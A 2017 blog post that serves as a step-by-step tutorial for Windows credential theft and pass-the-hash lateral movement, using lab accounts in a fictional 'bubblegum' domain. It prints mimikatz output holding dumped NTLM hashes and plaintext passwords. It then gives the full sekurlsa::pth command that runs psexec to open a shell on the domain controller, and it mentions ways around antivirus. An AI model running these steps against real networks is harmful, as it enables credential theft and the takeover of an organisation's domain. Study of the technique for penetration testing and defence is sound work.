Saturday, November 25, 2017

Windows Credential Attack

I've been reading about lateral movement lately, how attackers take advantage of Microsoft's Active Directory technology to create 'backdoors' upon successfully infiltrating the network. Much has been said and written about it, and we have all heard about the dreaded APTs (Advanced Persistent Threats). These guys are supposed to be state sponsored and amongst the best in the world.

In my opinion, it's a lot of hype. Anyone can be an APT. You don't need to be state sponsored to launch an attack or infiltrate corporate systems. All you need is a good Internet connection and the willingness to learn and explore. I have always said that even a 16-year-old can be a hacker. The thing that differentiates a state-sponsored attacker from a kid is motivation. State-sponsored hackers are also assumed to have deeper pockets, so having 0-day exploits in your arsenal is a definite advantage. Anyway, I'll leave this argument for another post. For this entry, I will talk about Windows credential attacks.

The scenario is post-exploitation, meaning after the attacker has gained administrative privilege on a host in your organization. The next move is to gain further access into the network. In a typical Windows environment, most PCs are authenticated against AD (Active Directory) on a Domain Controller (DC); the Kerberos authentication protocol issues a ticket to the authenticated host, and with this ticket the host can access other hosts in the same domain. The hashes and tickets can be reused by reading them directly from the host's memory or disk, or in some cases from the DC itself. Various articles cover abusing Windows credentials, Kerberos in particular; this post focuses on passing the hash. Maybe in my next article we can also talk about abusing Kerberos and creating golden tickets.

The NTLM hashes are stored encrypted in memory. A common technique is to pass the hash (PtH) over to another host, and mimikatz does a great job of using a built-in Microsoft API to decrypt these hashes.

Let's say our super-duper hacker has gained admin rights on Betty's PC, and her PC happens to be part of the bubblegum domain. She happens to be the domain admin for the company bubblegum.com. How convenient ;) For simplicity, we assume that Betty's PC has already been breached and the attacker has local admin privilege. We'll upload mimikatz. There are also various tools that can call mimikatz functions, so you don't necessarily have to use mimikatz itself, since some AVs flag it: if you are using Metasploit, the Meterpreter session can invoke mimikatz functions, and if you are keen on PowerShell, there are even PowerSploit scripts that invoke mimikatz functions.

For this example I am keeping it simple. We are just going to dump the encrypted hashes and pass them to the DC using psexec.

Dumping Hashes

1. Run mimikatz and check your privilege; you must have admin privilege on the host:

2. Dump the hashes in memory by running 'sekurlsa::logonpasswords'. You should see all password hashes in memory, even plain-text ones!

Authentication Id : 0 ; 1192637 (00000000:001232bd)
Session           : Interactive from 3
User Name         : Administrator
Domain            : WIN
Logon Server      : WIN
Logon Time        : 11/25/2017 2:54:07 PM
SID               : S-1-5-21-185860677-232557259-2993331253-500
        msv :
         [00010000] CredentialKeys
         * NTLM     : 9213b0c8fd855c4ec0267f303a376f31
         * SHA1     : 749b4dae3da83473b0491e9fab0bf151c932374a
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN
         * NTLM     : 9213b0c8fd855c4ec0267f303a376f31
         * SHA1     : 749b4dae3da83473b0491e9fab0bf151c932374a
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN
         * Password : !qwerty123
        kerberos :
         * Username : Administrator
         * Domain   : WIN
         * Password : (null)
        ssp :
        credman :


Authentication Id : 0 ; 1505847 (00000000:0016fa37)
Session           : Interactive from 1
User Name         : betty
Domain            : BUBBLEGUM
Logon Server      : WINDC01
Logon Time        : 11/25/2017 3:14:56 PM
SID               : S-1-5-21-185860677-232557259-2993331253-1000
        msv :
         [00000003] Primary
         * Username : betty
         * Domain   : BUBBLEGUM
         * NTLM     : 9213b0c8fd855c4ec0267f303a376f31
         * SHA1     : 749b4dae3da83473b0491e9fab0bf151c932374a
         [00010000] CredentialKeys
         * NTLM     : 9213b0c8fd855c4ec0267f303a376f31
         * SHA1     : 749b4dae3da83473b0491e9fab0bf151c932374a
        tspkg :
        wdigest :
         * Username : betty
         * Domain   : BUBBLEGUM
         * Password : !kldsljds
        kerberos :
         * Username : betty
         * Domain   : BUBBLEGUM.COM
         * Password : (null)
        ssp :
        credman :

<snip-------snip>

The above output shows two credentials, Administrator and betty. Notice that the Administrator account's domain is WIN while betty belongs to bubblegum.com. Our target is the bubblegum.com domain, and we happen to obtain her password in plain text!

Passing the Hash

3. We would now like to pass the hash using betty's credentials with the pth function built into mimikatz. If you see another cmd.exe prompt pop up, it means the credentials worked!

4. Now, let's try to pass this hash to the DC server from Betty's PC. I simply pass the hash dumped from her PC to the DC. Remember, you'll need psexec.exe on Betty's PC; it can be downloaded from the Microsoft website. The command I issue on Betty's machine using mimikatz is:

sekurlsa::pth /user:betty /domain:bubblegum /ntlm:9213b0c8fd855c4ec0267f303a376f31 /run:".\psexec64.exe \\10.0.0.1 -h cmd.exe"

If cmd.exe executes successfully, you should see a second prompt! Sometimes it takes a while for psexec to spawn cmd.exe, so be patient.

Notice that psexec64.exe has executed cmd.exe, and the hostname and whoami commands show that you are now on the DC as Betty. In my next article, I will cover how to dump the DC credentials and create the golden ticket ;-)

Stay tuned folks!